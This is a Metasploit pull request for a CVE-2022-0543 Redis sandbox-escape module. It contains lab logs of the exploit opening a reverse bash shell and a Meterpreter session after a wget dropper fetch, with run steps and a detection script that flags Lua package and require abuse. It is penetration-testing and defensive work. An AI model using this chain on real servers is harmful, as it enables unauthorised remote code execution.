Redis Sandbox Escape RCE (CVE-2022-0543) #16504
Just a couple minor suggestions. Got it tested without auth:
Output
msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > options
Module options (exploit/linux/redis/redis_debian_sandbox_escape):

   Name       Current Setting                           Required  Description
   ----       ---------------                           --------  -----------
   LUA_LIB    /usr/lib/x86_64-linux-gnu/liblua5.1.so.0  yes       LUA library path
   PASSWORD   mypassword                                no        Redis AUTH password
   RHOSTS                                               yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      6379                                      yes       The target port (TCP)
   SRVHOST    0.0.0.0                                   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                                      yes       The local port to listen on.
   SSLCert                                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                                         yes       Base path
   THREADS    1                                         yes       The number of concurrent threads (max one per host)
   URIPATH                                              no        The URI to use for this exploit (default is random)

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set rhost 192.168.140.140
rhost => 192.168.140.140
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Unix Command for cmd/unix/reverse_bash
[+] 192.168.140.140:6379 - Exploit complete!
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.140:48772 ) at 2022-04-26 13:24:42 -0500
id
uid=126(redis) gid=133(redis) groups=133(redis)
uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N] y
[*] 192.168.140.140 - Command shell session 1 closed. Reason: User exit
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set target 1
target => 1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] 192.168.140.140:6379 - Using URL: http://192.168.140.1:8080/963M5aN
[*] 192.168.140.140:6379 - Client 192.168.140.140 (Wget/1.20.3 (linux-gnu)) requested /963M5aN
[*] 192.168.140.140:6379 - Sending payload to 192.168.140.140 (Wget/1.20.3 (linux-gnu))
[+] 192.168.140.140:6379 - Exploit complete!
[*] 192.168.140.140:6379 - Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.140:48774 ) at 2022-04-26 13:24:59 -0500
[*] 192.168.140.140:6379 - Server stopped.
meterpreter > getuid
Server username: redis
meterpreter > sysinfo
Computer : 192.168.140.140
OS : Ubuntu 20.04 (Linux 5.13.0-40-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
…_escape.md Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
# Before we get crazy sending exploits over the wire, let's just check if this could | ||
# plausiably be a vulnerable version. Using INFO we can check for: | ||
# | ||
# 1. 4 < Version < 6.1 |
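Review bot: typo in the second comment line of this hunk, "plausiably" should read "plausibly"; worth fixing while the list of checks in this comment is being reordered.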
Maybe order those in the same order as the actual checks done below?
Release Notes

This exploit achieves remote code execution as the
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. This has been exploited in the wild. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.

On a typical redis deployment (not docker), this module achieves execution as the redis user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload.

Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64 (mostly due to the lack of test targets), which is likely to be the most popular version.

Failed Linting

I expect this to fail linting due to the has_check? call. However, this is required. See #13143

Other Weird Things

As mentioned above, the default Meterpreter is stageless due to the use of "MemoryDenyWriteExecute" otherwise causing the staged version to crash on failed mprotect. Technically, the Docker version could execute a staged Meterpreter but there is also no command stager (other than printf/echo and I don't want to make those options since they won't work in the normal case). And I guess I should clarify that means that target 1 does not work against the Docker target but does work against a normal Ubuntu install. I think this is fine since actually exploitable targets in the wild, in my opinion, are far more likely to be non-Docker targets.

Verification
Follow the setup steps in the documentation.
use exploit/linux/redis/redis_debian_sandbox_escape
set RHOST <ip>
set LHOST <ip>
set PASSWORD <password>
check
run
PoC Video || GTFO
https://www.youtube.com/watch?v=N5J7laXlMuo
PCAP || GTFO
redis_exploitation.zip
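As an added example, not part of this PR or of the Metasploit module, here is the defender-side counterpart to the mechanism the description names: Redis MONITOR (or command-log) lines are scanned for EVAL and SCRIPT LOAD bodies that reach for the Lua `package` table or `require`, neither of which a correctly sandboxed Redis exposes. The rule set and sample lines are constructed; the client addresses and the LUA_LIB path are taken from the test run quoted above.

```python
import codecs
import re
# One MONITOR record: <unix ts> [<db> <client addr>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[\d+ (\S+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# A correctly sandboxed Redis Lua environment exposes neither the `package` table
# nor `require`; a script naming either is worth an alert (constructed rule set).
SUSPICIOUS = [
    (re.compile(r'\bpackage\s*[.\[]'), "references the Lua package table"),
    (re.compile(r'\brequire\s*\('), "calls require()"),
]

def parse_monitor_line(line):
    """Return (timestamp, client, [args]) or None if the line is not MONITOR output."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    ts, client, rest = m.groups()
    # MONITOR escapes arguments C-style (\" \\ \n \xHH); undo that to get the Lua source.
    args = [codecs.decode(a, "unicode_escape") for a in ARG_RE.findall(rest)]
    return float(ts), client, args

def script_body(args):
    """Lua source carried by EVAL <script> ... or SCRIPT LOAD <script>, else None."""
    cmd = args[0].lower() if args else ""
    if cmd == "eval" and len(args) >= 2:
        return args[1]
    if cmd == "script" and len(args) >= 3 and args[1].lower() == "load":
        return args[2]
    return None

def scan_monitor(lines):
    """Return (timestamp, client, command, reason) for every script that trips a rule."""
    findings = []
    for ts, client, args in filter(None, map(parse_monitor_line, lines)):
        body = script_body(args)
        for pat, why in SUSPICIOUS:
            if body is not None and pat.search(body):
                findings.append((ts, client, args[0].lower(), why))
                break
    return findings

# Constructed sample MONITOR lines; addresses and the LUA_LIB path come from the PR.
SAMPLE = [
    '1650995082.123456 [0 192.168.140.140:48770] "eval" "return redis.call(\'get\', KEYS[1])" "1" "k"',
    '1650995083.654321 [0 192.168.140.1:51234] "eval" "local l = package.loadlib(\\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\\", \\"symbol_placeholder\\")" "0"',
    '1650995084.000001 [0 192.168.140.1:51234] "script" "load" "return require(\\"os\\")"',
    '1650995085.000002 [0 192.168.140.140:48770] "set" "counter" "1"',
]
```

Running `scan_monitor(SAMPLE)` flags the two scripts from 192.168.140.1 and leaves the ordinary `redis.call` script and the `SET` alone; the same function can be fed `redis-cli monitor` output line by line.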